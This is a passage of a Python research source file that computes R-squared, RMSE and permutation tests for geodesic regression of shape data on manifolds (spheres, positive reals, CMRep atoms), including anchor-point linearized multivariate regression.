tVec_est_to_y_i = est_pt_at_t_i.LogMap( pt_list[ n ][ i ] )
tVec_est_to_y_i.SetMeanRadius( mean_radius )
tVec_est_to_y_i.SetMeanScale( mean_area_s ** (1.0 / 3.0 ) )
rmse += ( tVec_est_to_y_i.normSquared() / float( nData ) )
rmse = np.sqrt( rmse )
return rmse
def R2Statistics_CMRep_Atom( t_list, pt_list, base, tangent ):
nData = len( pt_list )
nManifoldDim = pt_list[ 0 ].nDim
R2_Atom = []
R2_pos_atom = []
R2_rad_atom = []
# Calculate intrinsic mean
for i in range( nManifoldDim ):
pt_list_pos_i = []
pt_list_rad_i = []
for j in range( nData ):
pt_list_pos_i.append( pt_list[ j ].pt[ i ][ 0 ] )
pt_list_rad_i.append( pt_list[ j ].pt[ i ][ 1 ] )
t_list_pos_i = list( t_list )
t_list_rad_i = list( t_list )
base_pos_i = base.pt[ i ][ 0 ]
tangent_pos_i = tangent.tVector[ i ][ 0 ]
base_rad_i = base.pt[ i ][ 1 ]
tangent_rad_i = tangent.tVector[ i ][ 1 ]
R2_pos_i = R2Statistics( t_list_pos_i, pt_list_pos_i, base_pos_i, tangent_pos_i )
R2_rad_i = R2Statistics( t_list_rad_i, pt_list_rad_i, base_rad_i, tangent_rad_i )
R2_pos_atom.append( R2_pos_i )
R2_rad_atom.append( R2_rad_i )
R2_atom = [ R2_pos_atom, R2_rad_atom ]
return R2_atom
def R2Statistics_CMRep_Abstract_Atom( t_list, pt_list, base, tangent ):
nData = len( pt_list )
nManifoldDim = pt_list[ 0 ].nDim
R2_Atom = []
R2_Center = 0
R2_Scale = 0
RMSE_Atom = []
RMSE_Center = 0
RMSE_Scale = 0
# Center - Global, Euclidean
pt_list_center = []
t_list_center = list( t_list )
for i in range( nData ):
pt_list_center.append( pt_list[ i ].pt[ 0 ] )
base_center = base.pt[ 0 ]
tangent_center = tangent.tVector[ 0 ]
## R2
R2_center = R2Statistics( t_list_center, pt_list_center, base_center, tangent_center )
## RMSE
RMSE_Center = RootMeanSquaredError( t_list_center, pt_list_center, base_center, tangent_center )
# Scale - Global, Positive Real
pt_list_scale = []
t_list_scale = list( t_list )
for i in range( nData ):
pt_list_scale.append( pt_list[ i ].pt[ 1 ] )
print( "RMSE Scale Check" )
print( "41st Atom" )
print( pt_list_scale[ 40 ].pt[ 0 ] )
base_scale = base.pt[ 1 ]
tangent_scale = tangent.tVector[ 1 ]
## R2
R2_scale = R2Statistics( t_list_scale, pt_list_scale, base_scale, tangent_scale )
## RMSE
RMSE_scale = RootMeanSquaredError( t_list_scale, pt_list_scale, base_scale, tangent_scale )
# Postion Abstract - Global, Sphere
pt_list_pos_abst = []
t_list_pos_abst = list( t_list )
for i in range( nData ):
pt_list_pos_abst.append( pt_list[ i ].pt[ 2 ] )
base_pos_abst = base.pt[ 2 ]
tangent_pos_abst = tangent.tVector[ 2 ]
## R2
R2_pos_abst = R2Statistics( t_list_pos_abst, pt_list_pos_abst, base_pos_abst, tangent_pos_abst )
## RMSE
RMSE_pos_abst = RootMeanSquaredError( t_list_pos_abst, pt_list_pos_abst, base_pos_abst, tangent_pos_abst )
# Relative Position - Local, Euclidean
pt_list_pos_abst = []
t_list_pos_abst = list( t_list )
for i in range( nData ):
pt_list_pos_abst.append( pt_list[ i ].pt[ 2 ] )
base_pos_abst = base.pt[ 2 ]
tangent_pos_abst = tangent.tVector[ 2 ]
## Calculate a Frechet mean of relative postions
mu_pos_abstr = FrechetMean( pt_list_pos_abst )
H_sub = HelmertSubmatrix( nManifoldDim )
H_sub_T = H_sub.T
## Frechet Mean : Relative Positions on a 3(n-1)-1 sphere
mu_pos_abstr_sphere_matrix = np.array( mu_pos_abstr.pt ).reshape( -1, 3 )
## Frechet Mean : Relative Positions on Euclidean
mu_pos_abstr_euclidean_matrix = np.dot( H_sub_T, mu_pos_abstr_sphere_matrix )
## Estimated Trajectory
geodesic_trend_euclidean_arr = []
data_euclidean_arr = []
for i in range( nData ):
t_i = t_list_pos_abst[ i ]
## Estimated Points from Sphere to Euclidean
tVec_at_t_i = tangent_pos_abst.ScalarMultiply( t_i )
est_pt_at_t_i = base_pos_abst.ExponentialMap( tVec_at_t_i )
est_pt_at_t_i_sphere_matrix = np.array( est_pt_at_t_i.pt ).reshape( -1, 3 )
est_pt_at_t_i_euclidean_matrix = np.dot( H_sub_T, est_pt_at_t_i_sphere_matrix )
geodesic_trend_euclidean_arr.append( est_pt_at_t_i_euclidean_matrix )
## Data points from Sphere to Euclidean
data_i = pt_list_pos_abst[ i ]
data_i_sphere_matrix = np.array( data_i.pt ).reshape( -1, 3 )
data_i_euclidean_matrix = np.dot( H_sub_T, data_i_sphere_matrix )
data_euclidean_arr.append( data_i_euclidean_matrix )
## Calculate atom-wise locational R^2 on Euclidean metric
## R2
R2_Pos_Euclidean_Atom = []
## RMSE
RMSE_Pos_Euclidean_Atom = []
for d in range( nManifoldDim ):
var_mu_d = 0
var_est_d = 0
for i in range( nData ):
# Data
pt_i_d = data_euclidean_arr[ i ][ d, : ]
# Mean
mu_i_d = mu_pos_abstr_euclidean_matrix[ d, : ]
# Estimated
est_i_d = geodesic_trend_euclidean_arr[ i ][ d, : ]
sqDist_mu_i_d = np.linalg.norm( np.subtract( pt_i_d, mu_i_d ) ) ** 2
sqDist_est_i_d = np.linalg.norm( np.subtract( pt_i_d, est_i_d ) ) ** 2
var_mu_d += sqDist_mu_i_d
var_est_d += sqDist_est_i_d
R2_d = ( 1 - ( var_est_d / var_mu_d ) )
R2_Pos_Euclidean_Atom.append( R2_d )
RMSE_Pos_Euclidean_Atom.append( np.sqrt( var_est_d ) )
# Radius - Local, Positive Real : log-Euclidean
## R2
R2_Rad_PosReal_Atom = []
## RMSE
RMSE_Rad_PosReal_Atom = []
pt_list_rad = []
t_list_rad = list( t_list )
for i in range( nData ):
pt_list_rad.append( pt_list[ i ].pt[ 3 ] )
base_rad = base.pt[ 3 ]
tangent_rad = tangent.tVector[ 3 ]
## Calculate a Frechet mean of Radius
mu_rad = FrechetMean( pt_list_rad )
## Estimated Trend Trajectory
geodesic_trend_rad_arr = []
for i in range( nData ):
t_i = t_list_rad[ i ]
## Estimated Points from Sphere to Euclidean
tVec_at_t_i = tangent_rad.ScalarMultiply( t_i )
est_pt_at_t_i = base_rad.ExponentialMap( tVec_at_t_i )
geodesic_trend_rad_arr.append( est_pt_at_t_i )
for d in range( nManifoldDim ):
var_mu_d = 0
var_est_d = 0
for i in range( nData ):
# Data
pt_i_d = pt_list_rad[ i ].pt[ d ]
# Mean
mu_i_d = mu_rad.pt[ d ]
# Estimated
est_i_d = geodesic_trend_rad_arr[ i ].pt[ d ]
# Sq. distance to the Frechet mean
sqDist_mu_i_d = ( np.log( pt_i_d ) - np.log( mu_i_d ) ) ** 2
# Sq. distance to the estimated trajectory
sqDist_est_i_d = ( np.log( pt_i_d ) - np.log( est_i_d ) ) ** 2
var_mu_d += sqDist_mu_i_d
var_est_d += sqDist_est_i_d
R2_rad_d = ( 1 - ( var_est_d / var_mu_d ) )
R2_Rad_PosReal_Atom.append( R2_rad_d )
RMSE_Rad_PosReal_Atom.append( np.sqrt( var_est_d / float( nData ) ) )
# All R2 Statistics
R2_atom = [ R2_center, R2_scale, R2_pos_abst, R2_Pos_Euclidean_Atom, R2_Rad_PosReal_Atom ]
RMSE_Atom = [ RMSE_Center, RMSE_scale, RMSE_pos_abst, RMSE_Pos_Euclidean_Atom, RMSE_Rad_PosReal_Atom ]
return R2_atom, RMSE_Atom
def R2Statistics_CMRep_Abstract_Normal_Atom( t_list, pt_list, mu, base, tangent ):
nData = len( pt_list )
nManifoldDim = pt_list[ 0 ].nDim
R2_Atom = []
R2_Center = 0
R2_Scale = 0
RMSE_Atom = []
RMSE_Center = 0
RMSE_Scale = 0
# Center - Global, Euclidean
pt_list_center = []
t_list_center = list( t_list )
for i in range( nData ):
pt_list_center.append( pt_list[ i ].pt[ 0 ] )
base_center = base.pt[ 0 ]
tangent_center = tangent.tVector[ 0 ]
## R2
R2_center = R2Statistics_Mu( t_list_center, pt_list_center, base_center, tangent_center, mu.pt[ 0 ] )
## RMSE
RMSE_Center = RootMeanSquaredError( t_list_center, pt_list_center, base_center, tangent_center )
# Scale - Global, Positive Real
pt_list_scale = []
t_list_scale = list( t_list )
for i in range( nData ):
pt_list_scale.append( pt_list[ i ].pt[ 1 ] )
print( "RMSE Scale Check" )
print( "41st Atom" )
print( pt_list_scale[ 40 ].pt[ 0 ] )
base_scale = base.pt[ 1 ]
tangent_scale = tangent.tVector[ 1 ]
## R2
R2_scale = R2Statistics_Mu( t_list_scale, pt_list_scale, base_scale, tangent_scale, mu.pt[ 1 ] )
## RMSE
RMSE_scale = RootMeanSquaredError( t_list_scale, pt_list_scale, base_scale, tangent_scale )
# Postion Abstract - Global, Sphere
pt_list_pos_abst = []
t_list_pos_abst = list( t_list )
for i in range( nData ):
pt_list_pos_abst.append( pt_list[ i ].pt[ 2 ] )
base_pos_abst = base.pt[ 2 ]
tangent_pos_abst = tangent.tVector[ 2 ]
## R2
R2_pos_abst = R2Statistics_Mu( t_list_pos_abst, pt_list_pos_abst, base_pos_abst, tangent_pos_abst, mu.pt[ 2 ] )
## RMSE
RMSE_pos_abst = RootMeanSquaredError( t_list_pos_abst, pt_list_pos_abst, base_pos_abst, tangent_pos_abst )
# Radius - Local, Positive Real : log-Euclidean
## R2
R2_Rad_PosReal_Atom = []
## RMSE
RMSE_Rad_PosReal_Atom = []
pt_list_rad = []
t_list_rad = list( t_list )
for i in range( nData ):
pt_list_rad.append( pt_list[ i ].pt[ 3 ] )
base_rad = base.pt[ 3 ]
tangent_rad = tangent.tVector[ 3 ]
## Calculate a Frechet mean of Radius
mu_rad = mu.pt[ 3 ]
for d in range( nManifoldDim ):
t_list_rad_d = list( t_list )
pt_list_rad_d = []
for i in range( nData ):
rad_d_i = manifolds.pos_real( 1 )
rad_d_i.SetPoint( pt_list_rad[ i ].pt[ d ] )
pt_list_rad_d.append( rad_d_i )
base_rad_d = manifolds.pos_real( 1 )
base_rad_d.SetPoint( [ base_rad.pt[ d ] ] )
tangent_rad_d = manifolds.pos_real_tVec( 1 )
tangent_rad_d.SetTangentVector( tangent_rad.tVector[ d ] )
mu_rad_d = manifolds.pos_real( 1 )
mu_rad_d.SetPoint( [ mu_rad.pt[ d ] ] )
R2_rad_d = R2Statistics_Mu( t_list_rad_d, pt_list_rad_d, base_rad_d, tangent_rad_d, mu_rad_d )
R2_Rad_PosReal_Atom.append( R2_rad_d )
RMSE_rad_d = RootMeanSquaredError( t_list_rad_d, pt_list_rad_d, base_rad_d, tangent_rad_d )
RMSE_Rad_PosReal_Atom.append( RMSE_rad_d )
# Boundary Normal 1 - Local, S^2
## R2
R2_Normal1_Sphere_Atom = []
## RMSE
RMSE_Normal1_Sphere_Atom = []
pt_list_normal1 = []
t_list_normal1 = list( t_list )
for i in range( nData ):
pt_list_normal1.append( pt_list[ i ].pt[ 4 ] )
base_normal1 = base.pt[ 4 ]
tangent_normal1 = tangent.tVector[ 4 ]
mu_normal1 = mu.pt[ 4 ]
for d in range( nManifoldDim ):
t_list_normal1_d = list( t_list )
pt_list_normal1_d = []
for i in range( nData ):
pt_list_normal1_d.append( pt_list_normal1[ i ][ d ] )
base_normal1_d = manifolds.sphere( 3 )
base_normal1_d.SetPoint( base_normal1[ d ].pt )
tangent_normal1_d = manifolds.sphere_tVec( 3 )
tangent_normal1_d.SetTangentVector( tangent_normal1[ d ].tVector )
mu_normal1_d = manifolds.sphere( 3 )
mu_normal1_d.SetPoint( mu_normal1[ d ].pt )
R2_normal1_d = R2Statistics_Mu( t_list_normal1_d, pt_list_normal1_d, base_normal1_d, tangent_normal1_d, mu_normal1_d )
R2_Normal1_Sphere_Atom.append( R2_normal1_d )
RMSE_normal1_d = RootMeanSquaredError( t_list_normal1_d, pt_list_normal1_d, base_normal1_d, tangent_normal1_d )
RMSE_Normal1_Sphere_Atom.append( RMSE_normal1_d )
# Boundary Normal 2 - Local, S^2
## R2
R2_Normal2_Sphere_Atom = []
## RMSE
RMSE_Normal2_Sphere_Atom = []
pt_list_normal2 = []
t_list_normal2 = list( t_list )
for i in range( nData ):
pt_list_normal2.append( pt_list[ i ].pt[ 5 ] )
base_normal2 = base.pt[ 5 ]
tangent_normal2 = tangent.tVector[ 5 ]
mu_normal2 = mu.pt[ 5 ]
for d in range( nManifoldDim ):
t_list_normal2_d = list( t_list )
pt_list_normal2_d = []
for i in range( nData ):
pt_list_normal2_d.append( pt_list_normal2[ i ][ d ] )
base_normal2_d = manifolds.sphere( 3 )
base_normal2_d.SetPoint( base_normal2[ d ].pt )
tangent_normal2_d = manifolds.sphere_tVec( 3 )
tangent_normal2_d.SetTangentVector( tangent_normal2[ d ].tVector )
mu_normal2_d = manifolds.sphere( 3 )
mu_normal2_d.SetPoint( mu_normal2[ d ].pt )
R2_normal2_d = R2Statistics_Mu( t_list_normal2_d, pt_list_normal2_d, base_normal2_d, tangent_normal2_d, mu_normal2_d )
R2_Normal2_Sphere_Atom.append( R2_normal2_d )
RMSE_normal2_d = RootMeanSquaredError( t_list_normal2_d, pt_list_normal2_d, base_normal2_d, tangent_normal2_d )
RMSE_Normal2_Sphere_Atom.append( RMSE_normal2_d )
# All R2 Statistics
R2_atom = [ R2_center, R2_scale, R2_pos_abst, R2_Rad_PosReal_Atom, R2_Normal1_Sphere_Atom, R2_Normal2_Sphere_Atom ]
RMSE_Atom = [ RMSE_Center, RMSE_scale, RMSE_pos_abst, RMSE_Rad_PosReal_Atom, RMSE_Normal1_Sphere_Atom, RMSE_Normal2_Sphere_Atom ]
return R2_atom, RMSE_Atom
def RootMeanSquaredError_CMRep_Atom( t_list, pt_list, base, tangent ):
nData = len( pt_list )
nManifoldDim = pt_list[ 0 ].nDim
RMSE_Atom = []
RMSE_pos_atom = []
RMSE_rad_atom = []
# Calculate intrinsic mean
for i in range( nManifoldDim ):
pt_list_pos_i = []
pt_list_rad_i = []
for j in range( nData ):
pt_list_pos_i.append( pt_list[ j ].pt[ i ][ 0 ] )
pt_list_rad_i.append( pt_list[ j ].pt[ i ][ 1 ] )
t_list_pos_i = list( t_list )
t_list_rad_i = list( t_list )
base_pos_i = base.pt[ i ][ 0 ]
tangent_pos_i = tangent.tVector[ i ][ 0 ]
base_rad_i = base.pt[ i ][ 1 ]
tangent_rad_i = tangent.tVector[ i ][ 1 ]
RMSE_pos_i = RootMeanSquaredError( t_list_pos_i, pt_list_pos_i, base_pos_i, tangent_pos_i )
RMSE_rad_i = RootMeanSquaredError( t_list_rad_i, pt_list_rad_i, base_rad_i, tangent_rad_i )
RMSE_pos_atom.append( RMSE_pos_i )
RMSE_rad_atom.append( RMSE_rad_i )
RMSE_atom = [ RMSE_pos_atom, RMSE_rad_atom ]
return RMSE_atom
def NullHypothesisTestingPermutationTest( t_list, pt_list, base, tangent, nTrial = 10000, max_iter = 500, stepSize = 0.05, step_tol = 1e-8 ):
if base.Type == "Sphere":
return NullHypothesisTestingPermutationTest_Sphere( t_list, pt_list, base, tangent, nTrial, max_iter, stepSize, step_tol )
elif base.Type == "PositiveReal":
return NullHypothesisTestingPermutationTest_PosReal( t_list, pt_list, base, tangent, nTrial, max_iter, stepSize, step_tol )
# elif base.Type == "Euclidean":
# R2Statistics_Euclidean( t_list, pt_list, base, tangent )
else:
print( "Manifold Type Unknown" )
return -1
def NullHypothesisTestingPermutationTest_Sphere( t_list, pt_list, base, tangent, nTrial = 10000, max_iter = 500, stepSize = 0.05, step_tol = 1e-8 ):
# Estimated R2
R2_est = R2Statistics( t_list, pt_list, base, tangent )
cnt_greater_R2 = 0
for i in range( nTrial ):
t_list_permuted = list( t_list )
shuffle( t_list_permuted )
base_i, tangent_i = GeodesicRegression( t_list_permuted, pt_list, max_iter, stepSize, step_tol, False )
R2_i = R2Statistics( t_list_permuted, pt_list, base_i, tangent_i )
if R2_i > R2_est:
cnt_greater_R2 += 1
return float( cnt_greater_R2 ) / float( nTrial )
def NullHypothesisTestingPermutationTest_PosReal( t_list, pt_list, base, tangent, nTrial = 10000, max_iter = 500, stepSize = 0.05, step_tol = 1e-8 ):
# Estimated R2
R2_est = R2Statistics( t_list, pt_list, base, tangent )
cnt_greater_R2 = 0
for i in range( nTrial ):
t_list_permuted = list( t_list )
shuffle( t_list_permuted )
base_i, tangent_i = GeodesicRegression( t_list_permuted, pt_list, max_iter, stepSize, step_tol, False )
R2_i = R2Statistics( t_list_permuted, pt_list, base_i, tangent_i )
if R2_i > R2_est:
cnt_greater_R2 += 1
return float( cnt_greater_R2 ) / float( nTrial )
##########################################################################################
### Multivariate Anchor Point Linearized Geodesic Regression ###
##########################################################################################
def MultivariateLinearizedGeodesicRegression( X, Y, VG, max_iter = 500, stepSize = 0.05, step_tol = 0.01, useFrechetMeanAnchor = False, verbose=False ):
if pt_list[ 0 ].Type == "Sphere":
return MultivariateLinearizedGeodesicRegression_Sphere( X, Y, max_iter, stepSize, step_tol, useFrechetMeanAnchor, verbose )
# elif pt_list[ 0 ].Type == "PositiveReal":
# return LinearizedGeodesicRegression_PosReal( t_list, pt_list, max_iter, stepSize, step_tol, useFrechetMeanAnchor, verbose )
# elif pt_list[ 0 ].Type == "Euclidean":
# return LinearizedGeodesicRegression_Euclidean( t_list, pt_list, max_iter, stepSize, step_tol, useFrechetMeanAnchor, verbose )
# elif pt_list[ 0 ].Type == "CMRep":
# return LinearizedGeodesicRegression_CMRep( t_list, pt_list, max_iter, stepSize, step_tol, useFrechetMeanAnchor, verbose )
# elif pt_list[ 0 ].Type == "CMRep_Abstract":
# return LinearizedGeodesicRegression_CMRep_Abstract( t_list, pt_list, max_iter, stepSize, step_tol, useFrechetMeanAnchor, verbose )
else:
print( "Manifold type is not known" )
print( "Or a function is not ready, mb" )
return -1
def MultivariateLinearizedGeodesicRegression_Sphere( X, Y, VG, max_iter = 100, stepSize = 0.05, step_tol = 1e-8, useFrechetMeanAnchor = False, verbose=True ):
if verbose:
print( "=================================================================" )
print( " Linear Regression on Anchor Point Tangent Vector Space " )
print( "=================================================================" )
print( "No. Independent Varibles : " + str( len( X[ 0 ] ) ) )
print( "No. Observations : " + str( len( X ) ) )
nData = len( Y )
nParam = len( X[ 0 ] )
# Continuous variable such as age should be the last entry of independent variables
t_list = []
for i in range( len( X ) ):
t_list.append( X[ i ][ -1 ] )
# Initialize an anchor point
if useFrechetMeanAnchor:
p_anchor = FrechetMean( Y )
else:
t_min_idx = np.argmin( t_list )
p_anchor = Y[ t_min_idx ]
nManifoldDim = p_anchor.nDim
# Initial intercept point
init_Interp = manifolds.sphere( nManifoldDim )
# Initial set of tangent vectors
init_tVec_arr = []
for i in range( nParam ):
init_tVec_arr.append( manifolds.sphere_tVec( nManifoldDim ) )
base = init_Interp
tangent_arr = init_tVec_arr
# Iteration Parameters
prevEnergy = 1e10
prevBase = base
prev_tVec_arr = tangent_arr
for i in range( max_iter ):
tVec_list = []
w_list = []
for d in range( nManifoldDim ):
w_list.append( [] )
for j in range( nData ):
tVec_j = p_anchor.LogMap( Y[ j ] )
for d in range( nManifoldDim ):
w_list[d].append( tVec_j.tVector[d] )
estModel_list = []
for d in range( nManifoldDim ):
X_sm = sm.add_constant( X )
w_d_np = np.asarray( w_list[ d ] )
LS_model_d = sm.OLS( w_d_np, X_sm )
# est_d = LS_model_d.fit(method='qr')
est_d = LS_model_d.fit()
estModel_list.append( est_d )
if verbose:
print( est_d.summary() )
# Intercept point
v_to_base_on_p_anchor = manifolds.sphere_tVec( nManifoldDim )
for d in range( nManifoldDim ):
v_to_base_on_p_anchor.tVector[ d ] = estModel_list[ d ].params[ 0 ]
print( "Anchor point to intercept" )
print( v_to_base_on_p_anchor.tVector )
newBase = p_anchor.ExponentialMap( v_to_base_on_p_anchor )
new_tVec_arr = []
for par in range( nParam ):
v_tangent_on_p_anchor_param = manifolds.sphere_tVec( nManifoldDim )
for d in range( nManifoldDim ):
v_tangent_on_p_anchor_param.tVector[ d ] = estModel_list[ d ].params[ par + 1 ]
newTangent_param = p_anchor.ParallelTranslateAtoB( p_anchor, newBase, v_tangent_on_p_anchor_param )
new_tVec_arr.append( newTangent_param )
# Calculate energy to check if the model was minimized
energy = 0
for n in range( nData ):
target = Y[ n ]
current_tangent_VG_intercept = manifolds.sphere_tVec( nManifoldDim )
current_tangent_VG_slope = manifolds.sphere_tVec( nManifoldDim )
for d in range( nManifoldDim ):
current_tangent_VG_slope.tVector[ d ] = 0
current_tangent_VG_intercept.tVector[ d ] = 0
for par in range( nParam ):
# Intercept
if VG[ par ] == 0:
for d in range( nManifoldDim ):
current_tangent_VG_intercept.tVector[ d ] += ( new_tVec_arr[ par ].tVector[ d ] * X[ n ][ par ] )
# Slope
elif VG[ par ] == 1:
for d in range( nManifoldDim ):
current_tangent_VG_slope.tVector[ d ] += ( new_tVec_arr[ par ].tVector[ d ] * X[ n ][ par ] )
intercept_n = newBase.ExponentialMap( current_tangent_VG_intercept )
slope_n = newBase.ParallelTranslateAtoB( newBase, intercept_n, current_tangent_VG_slope )
estimate_n = intercept_n.ExponentialMap( slope_n )
et = estimate_n.LogMap( target )
# Energy of the tangential error
energy += et.normSquared()
if energy >= prevEnergy:
if verbose:
print( "=========================" )
print( " Energy Increased " )
print ( energy )
print( "=========================" )
break;
else:
prevBase = newBase
prev_tVec_arr = new_tVec_arr
p_anchor = newBase
base = newBase
tangent_arr = new_tVec_arr
prevEnergy = energy
if verbose:
print( "==================================" )
print( str( i ) + "th Iteration " )
print( energy )
print( "==================================" )
if stepSize < step_tol:
if verbose:
print( "==================================" )
print( "Step size under tolerance")
print( "Aborting")
print( "==================================" )
break
return base, tangent_arr
def MultivariateLinearizedGeodesicRegression_Sphere_Additive( X, Y, max_iter = 100, stepSize = 0.05, step_tol = 1e-8, useFrechetMeanAnchor = False, verbose=True ):
if verbose:
print( "=================================================================" )
print( " Linear Regression on Anchor Point Tangent Vector Space " )
print( "=================================================================" )
print( "No. Independent Varibles : " + str( len( X[ 0 ] ) ) )
print( "No. Observations : " + str( len( X ) ) )
nData = len( Y )
nParam = len( X[ 0 ] )
# Continuous variable such as age should be the last entry of independent variables
t_list = []
for i in range( len( X ) ):
t_list.append( X[ i ][ -1 ] )
# Initialize an anchor point
if useFrechetMeanAnchor:
p_anchor = FrechetMean( Y )
else:
t_min_idx = np.argmin( t_list )
p_anchor = Y[ t_min_idx ]
nManifoldDim = p_anchor.nDim
# Initial intercept point
init_Interp = manifolds.sphere( nManifoldDim )
# Initial set of tangent vectors
init_tVec_arr = []
for i in range( nParam ):
init_tVec_arr.append( manifolds.sphere_tVec( nManifoldDim ) )
base = init_Interp
tangent_arr = init_tVec_arr
# Iteration Parameters
prevEnergy = 1e10
prevBase = base
prev_tVec_arr = tangent_arr
for i in range( max_iter ):
tVec_list = []
w_list = []
for d in range( nManifoldDim ):
w_list.append( [] )
for j in range( nData ):
tVec_j = p_anchor.LogMap( Y[ j ] )
for d in range( nManifoldDim ):
w_list[d].append( tVec_j.tVector[d] )
estModel_list = []
for d in range( nManifoldDim ):
X_sm = sm.add_constant( X )
w_d_np = np.asarray( w_list[ d ] )
LS_model_d = sm.OLS( w_d_np, X_sm )
# est_d = LS_model_d.fit(method='qr')
est_d = LS_model_d.fit()
estModel_list.append( est_d )
if verbose:
print( est_d.summary() )
# Intercept point
v_to_base_on_p_anchor = manifolds.sphere_tVec( nManifoldDim )
for d in range( nManifoldDim ):
v_to_base_on_p_anchor.tVector[ d ] = estModel_list[ d ].params[ 0 ]
print( "Anchor poin t to intercept" )
print( v_to_base_on_p_anchor.tVector )
newBase = p_anchor.ExponentialMap( v_to_base_on_p_anchor )
new_tVec_arr = []
for par in range( nParam ):
v_tangent_on_p_anchor_param = manifolds.sphere_tVec( nManifoldDim )
for d in range( nManifoldDim ):
v_tangent_on_p_anchor_param.tVector[ d ] = estModel_list[ d ].params[ par + 1 ]
newTangent_param = p_anchor.ParallelTranslateAtoB( p_anchor, newBase, v_tangent_on_p_anchor_param )
new_tVec_arr.append( newTangent_param )
# Calculate energy to check if the model was minimized
energy = 0
for n in range( nData ):
target = Y[ n ]
current_tangent = manifolds.sphere_tVec( nManifoldDim )
for d in range( nManifoldDim ):
current_tangent.tVector[ d ] = 0
for par in range( nParam ):
for d in range( nManifoldDim ):
current_tangent.tVector[ d ] += ( new_tVec_arr[ par ].tVector[ d ] * X[ n ][ par ] )
estimate_n = newBase.ExponentialMap( current_tangent )
et = estimate_n.LogMap( target )
# Energy of the tangential error
energy += et.normSquared()
if energy >= prevEnergy:
if verbose:
print( "=========================" )
print( " Energy Increased " )
print ( energy )
print( "=========================" )
break;
else:
prevBase = newBase
prev_tVec_arr = new_tVec_arr
p_anchor = newBase
base = newBase
tangent_arr = new_tVec_arr
prevEnergy = energy
if verbose:
print( "==================================" )
print( str( i ) + "th Iteration " )
print( energy )
print( "==================================" )
if stepSize < step_tol:
if verbose:
print( "==================================" )
print( "Step size under tolerance")
print( "Aborting")
print( "==================================" )
break
return base, tangent_arr
def MultivariateLinearizedGeodesicRegression_Intercept_Sphere( X, Y, max_iter = 100, stepSize = 0.05, step_tol = 1e-8, useFrechetMeanAnchor = False, verbose=True ):
# if verbose:
# print( "=================================================================" )
# print( " Linear Regression on Anchor Point Tangent Vector Space " )
# print( "=================================================================" )
# print( "No. Independent Varibles : " + str( len( X[ 0 ] ) ) )
# print( "No. Observations : " + str( len( X ) ) )
nData = len( Y )
nParam = len( X[ 0 ] )
# Anchor point is chosen by the last entry of covariates
# Continuous variable such as a genetic disease score should be the last entry of covariates
# If data don't have a continuous covariates, the last entry can be a categorical covariate
t_list = []
for i in range( len( X ) ):
t_list.append( X[ i ][ -1 ] )
# Set an anchor point
t_min_idx = np.argmin( t_list )
p_anchor = Y[ t_min_idx ]
nManifoldDim = p_anchor.nDim
# Initial intercept point
init_Interp = manifolds.sphere( nManifoldDim )
# Initial set of tangent vectors
init_tVec_arr = []
for i in range( nParam ):
init_tVec_arr.append( manifolds.sphere_tVec( nManifoldDim ) )
base = init_Interp
tangent_arr = init_tVec_arr
# Iteration Parameters
prevEnergy = 1e10
prevBase = base
prev_tVec_arr = tangent_arr
for i in range( max_iter ):
tVec_list = []
w_list = []
for d in range( nManifoldDim ):
w_list.append( [] )
for j in range( nData ):
tVec_j = p_anchor.LogMap( Y[ j ] )
for d in range( nManifoldDim ):
w_list[d].append( tVec_j.tVector[d] )
estModel_list = []
for d in range( nManifoldDim ):
print( "X")
print( X )
X_sm = sm.add_constant( X )
w_d_np = np.asarray( w_list[ d ] )
LS_model_d = sm.OLS( w_d_np, X_sm )
# est_d = LS_model_d.fit(method='qr')
est_d = LS_model_d.fit()
estModel_list.append( est_d )
if verbose:
print( est_d.summary() )
# Intercept point
v_to_base_on_p_anchor = manifolds.sphere_tVec( nManifoldDim )
for d in range( nManifoldDim ):
v_to_base_on_p_anchor.tVector[ d ] = estModel_list[ d ].params[ 0 ]
print( "Anchor point to intercept" )
print( v_to_base_on_p_anchor.tVector )
newBase = p_anchor.ExponentialMap( v_to_base_on_p_anchor )
new_tVec_arr = []
for par in range( nParam ):
v_tangent_on_p_anchor_param = manifolds.sphere_tVec( nManifoldDim )
for d in range( nManifoldDim ):
v_tangent_on_p_anchor_param.tVector[ d ] = estModel_list[ d ].params[ par + 1 ]
newTangent_param = p_anchor.ParallelTranslateAtoB( p_anchor, newBase, v_tangent_on_p_anchor_param )
new_tVec_arr.append( newTangent_param )
# Calculate energy to check if the model was minimized
energy = 0
for n in range( nData ):
target = Y[ n ]
current_tangent_VG_intercept = manifolds.sphere_tVec( nManifoldDim )
current_tangent_VG_slope = manifolds.sphere_tVec( nManifoldDim )
for d in range( nManifoldDim ):
current_tangent_VG_slope.tVector[ d ] = 0
current_tangent_VG_intercept.tVector[ d ] = 0
tangent_t_n = manifolds.sphere_tVec( nManifoldDim )
for par in range( nParam ):
for d in range( nManifoldDim ):
tangent_t_n.tVector[ d ] += ( new_tVec_arr[ par ].tVector[ d ] * X[ n ][ par ] )
estimate_n = newBase.ExponentialMap( tangent_t_n )
et = estimate_n.LogMap( target )
# Energy of the tangential error
energy += et.normSquared()
if energy >= prevEnergy:
if verbose:
print( "=========================" )
print( " Energy Increased " )
print ( energy )
print( "=========================" )
break;
else:
prevBase = newBase
prev_tVec_arr = new_tVec_arr
p_anchor = newBase
base = newBase
tangent_arr = new_tVec_arr
prevEnergy = energy
if verbose:
print( "==================================" )
print( str( i ) + "th Iteration " )
print( energy )
print( "==================================" )
if stepSize < step_tol:
if verbose:
print( "==================================" )
print( "Step size under tolerance")
print( "Aborting")
print( "==================================" )
break
return base, tangent_arr
def MultivariateLinearizedGeodesicRegression_Slope_Sphere( X, Y, beta0, p0_list, tVec_intercept_arr, cov_intercept_list, verbose=True ):
# if verbose:
# print( "=================================================================" )
# print( " Linear Regression on Anchor Point Tangent Vector Space " )
# print( "=================================================================" )
if len( X ) == 0:
nManifoldDim = beta0.nDim
slope_tVec = manifolds.sphere_tVec( nManifoldDim )
for d in range( nManifoldDim ):
slope_tVec.tVector[ d ] = 0
print( len( Y ) )
for i in range( len( Y ) ):
Y_i = Y [ i ]
if i == 0:
Y_i_tilde = Y_i
else:
beta_tVec_f_i = manifolds.sphere_tVec( nManifoldDim )
for tt in range( len( cov_intercept_list[ i ] ) ):
est_beta_tt = tVec_intercept_arr[ tt ]
for kk in range( nManifoldDim ):
beta_tVec_f_i.tVector[ kk ] += ( est_beta_tt.tVector[ kk ] * cov_intercep_list[ i ][ tt ] )
f_i = beta0.ExponentialMap( est_beta_tt )
Y_i_at_f_i = p0_list[ i ].ParallelTranslateAtoB( p0_list[i], f_i, Y_i )
